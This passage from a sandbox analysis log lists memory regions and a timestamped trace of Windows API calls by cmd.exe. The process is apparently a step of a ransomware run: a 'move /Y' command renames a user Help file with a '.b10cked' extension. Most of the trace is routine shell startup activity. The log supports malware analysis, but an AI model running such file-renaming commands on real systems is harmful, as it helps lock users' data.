= 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28912 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28913 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28914 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28915 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28916 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28917 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 28918 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28919 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28920 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28921 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 28922 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 28923 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 28924 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 28925 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 28926 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001200000" filename = "" Region: id = 28938 start_va = 0x1370000 end_va = 0x142ffff entry_point = 0x1370000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 645 os_tid = 0xc20 [0196.072] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fe94 | out: lpSystemTimeAsFileTime=0x24fe94*(dwLowDateTime=0xa9b0e460, dwHighDateTime=0x1d440a9)) [0196.072] GetCurrentProcessId () returned 0x53c [0196.072] GetCurrentThreadId () returned 0xc20 [0196.072] GetTickCount () returned 0x37953 [0196.072] QueryPerformanceCounter (in: lpPerformanceCount=0x24fe8c | out: lpPerformanceCount=0x24fe8c*=25286149052) returned 1 [0196.073] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0196.073] __set_app_type (_Type=0x1) [0196.073] __p__fmode () returned 0x76b331f4 [0196.073] __p__commode () returned 0x76b331fc [0196.073] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0196.073] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0196.073] GetCurrentThreadId () returned 0xc20 [0196.073] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc20) returned 0x38 [0196.073] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0196.073] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0196.073] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.074] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0196.074] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fe24 | out: phkResult=0x24fe24*=0x0) returned 0x2 [0196.074] VirtualQuery 
(in: lpAddress=0x24fe5b, lpBuffer=0x24fdf4, dwLength=0x1c | out: lpBuffer=0x24fdf4*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.074] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fdf4, dwLength=0x1c | out: lpBuffer=0x24fdf4*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0196.074] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fdf4, dwLength=0x1c | out: lpBuffer=0x24fdf4*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0196.074] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fdf4, dwLength=0x1c | out: lpBuffer=0x24fdf4*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.074] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fdf4, dwLength=0x1c | out: lpBuffer=0x24fdf4*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0196.074] GetConsoleOutputCP () returned 0x1b5 [0196.074] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.074] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0196.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.074] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0196.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.074] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0196.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.074] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0196.075] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.075] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 
| out: lpMode=0x4a9e41b0) returned 1 [0196.075] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.075] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0196.075] GetEnvironmentStringsW () returned 0x2f0190* [0196.075] FreeEnvironmentStringsW (penv=0x2f0190) returned 1 [0196.075] GetEnvironmentStringsW () returned 0x2f0190* [0196.075] FreeEnvironmentStringsW (penv=0x2f0190) returned 1 [0196.075] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ed94 | out: phkResult=0x24ed94*=0x40) returned 0x0 [0196.075] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x0, lpData=0x24eda0*=0xb8, lpcbData=0x24ed98*=0x1000) returned 0x2 [0196.075] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x4, lpData=0x24eda0*=0x1, lpcbData=0x24ed98*=0x4) returned 0x0 [0196.075] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x0, lpData=0x24eda0*=0x1, lpcbData=0x24ed98*=0x1000) returned 0x2 [0196.075] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x4, lpData=0x24eda0*=0x0, lpcbData=0x24ed98*=0x4) returned 0x0 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x4, lpData=0x24eda0*=0x40, lpcbData=0x24ed98*=0x4) returned 0x0 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x4, 
lpData=0x24eda0*=0x40, lpcbData=0x24ed98*=0x4) returned 0x0 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x0, lpData=0x24eda0*=0x40, lpcbData=0x24ed98*=0x1000) returned 0x2 [0196.076] RegCloseKey (hKey=0x40) returned 0x0 [0196.076] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ed94 | out: phkResult=0x24ed94*=0x40) returned 0x0 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x0, lpData=0x24eda0*=0x40, lpcbData=0x24ed98*=0x1000) returned 0x2 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x4, lpData=0x24eda0*=0x1, lpcbData=0x24ed98*=0x4) returned 0x0 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x0, lpData=0x24eda0*=0x1, lpcbData=0x24ed98*=0x1000) returned 0x2 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x4, lpData=0x24eda0*=0x0, lpcbData=0x24ed98*=0x4) returned 0x0 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x4, lpData=0x24eda0*=0x9, lpcbData=0x24ed98*=0x4) returned 0x0 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x4, lpData=0x24eda0*=0x9, lpcbData=0x24ed98*=0x4) returned 0x0 [0196.076] 
RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x0, lpData=0x24eda0*=0x9, lpcbData=0x24ed98*=0x1000) returned 0x2 [0196.076] RegCloseKey (hKey=0x40) returned 0x0 [0196.076] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639e [0196.076] srand (_Seed=0x5b88639e) [0196.076] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_NamedURL.HxW.b10cked\"" [0196.076] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_NamedURL.HxW.b10cked\"" [0196.076] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.077] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2f18f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0196.077] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0196.077] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0196.077] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0196.077] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0196.077] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0196.077] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0196.077] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0196.077] _wcsicmp (_String1="PROMPT", 
_String2="DATE") returned 12 [0196.077] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0196.077] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0196.077] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0196.077] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0196.077] GetEnvironmentStringsW () returned 0x2f22e0* [0196.077] FreeEnvironmentStringsW (penv=0x2f22e0) returned 1 [0196.077] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.077] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0196.077] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0196.077] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0196.077] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0196.077] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0196.077] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0196.078] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0196.078] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0196.078] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0196.078] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fb60 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.078] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24fb60, lpFilePart=0x24fb5c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24fb5c*="Desktop") returned 0x18 [0196.078] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0196.078] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f8dc | out: lpFindFileData=0x24f8dc) returned 0x2f0020 [0196.078] FindClose (in: hFindFile=0x2f0020 | out: hFindFile=0x2f0020) 
returned 1 [0196.078] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f8dc | out: lpFindFileData=0x24f8dc) returned 0x2f0020 [0196.078] FindClose (in: hFindFile=0x2f0020 | out: hFindFile=0x2f0020) returned 1 [0196.078] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f8dc | out: lpFindFileData=0x24f8dc) returned 0x2f0020 [0196.078] FindClose (in: hFindFile=0x2f0020 | out: hFindFile=0x2f0020) returned 1 [0196.078] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0196.078] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0196.079] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0196.079] GetEnvironmentStringsW () returned 0x2f2b00* [0196.079] FreeEnvironmentStringsW (penv=0x2f2b00) returned 1 [0196.079] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.079] GetConsoleOutputCP () returned 0x1b5 [0196.079] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.079] GetUserDefaultLCID () returned 0x409 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fca0, cchData=128 | out: lpLCData="0") returned 2 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fca0, cchData=128 | out: lpLCData="0") returned 2 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fca0, cchData=128 | out: lpLCData="1") returned 2 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") 
returned 4 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0196.080] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0196.081] GetConsoleTitleW (in: lpConsoleTitle=0x2e08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.081] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0196.081] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0196.081] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0196.081] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0196.082] _wcsicmp (_String1="move", _String2=")") returned 68 [0196.082] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0196.082] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0196.082] _wcsicmp (_String1="IF", _String2="move") returned -4 [0196.082] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0196.082] _wcsicmp (_String1="REM", _String2="move") returned 5 
[0196.082] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0196.085] GetConsoleTitleW (in: lpConsoleTitle=0x24f998, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.085] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0196.085] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0196.085] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0196.085] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0196.085] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0196.085] _wcsicmp (_String1="move", _String2="CD") returned 10 [0196.085] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0196.085] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0196.085] _wcsicmp (_String1="move", _String2="REN") returned -5 [0196.085] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0196.085] _wcsicmp (_String1="move", _String2="SET") returned -6 [0196.086] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0196.086] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0196.086] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0196.086] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0196.086] _wcsicmp (_String1="move", _String2="MD") returned 11 [0196.086] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0196.086] _wcsicmp (_String1="move", _String2="RD") returned -5 [0196.086] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0196.086] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0196.086] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0196.086] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0196.086] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0196.086] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0196.086] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0196.086] _wcsicmp (_String1="move", _String2="VER") returned -9 [0196.086] _wcsicmp (_String1="move", _String2="VOL") 
returned -9 [0196.086] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0196.086] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0196.086] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0196.086] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0196.086] _wcsicmp (_String1="move", _String2="START") returned -6 [0196.086] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0196.086] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0196.086] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0196.088] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.088] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.088] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f754, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f74c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f74c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0196.088] 
_wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0196.089] _wcsnicmp 
(_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0196.089] _wcsicmp (_String1="HX_103~2.HXW", _String2=".") returned 58 [0196.089] _wcsicmp (_String1="HX_103~2.HXW", _String2="..") returned 58 [0196.089] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_103~2.hxw")) returned 0x2022 [0196.089] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2f1e58 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.089] SetErrorMode (uMode=0x0) returned 0x0 [0196.089] SetErrorMode (uMode=0x1) returned 0x0 [0196.090] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW", nBufferLength=0x104, lpBuffer=0x24f0dc, lpFilePart=0x24f0c4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW", lpFilePart=0x24f0c4*="HX_103~2.HXW") returned 0x27 [0196.090] SetErrorMode (uMode=0x0) returned 0x1 [0196.090] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0196.090] _wcsicmp (_String1="HX_103~2.HXW", _String2=".") returned 58 [0196.090] _wcsicmp (_String1="HX_103~2.HXW", _String2="..") returned 58 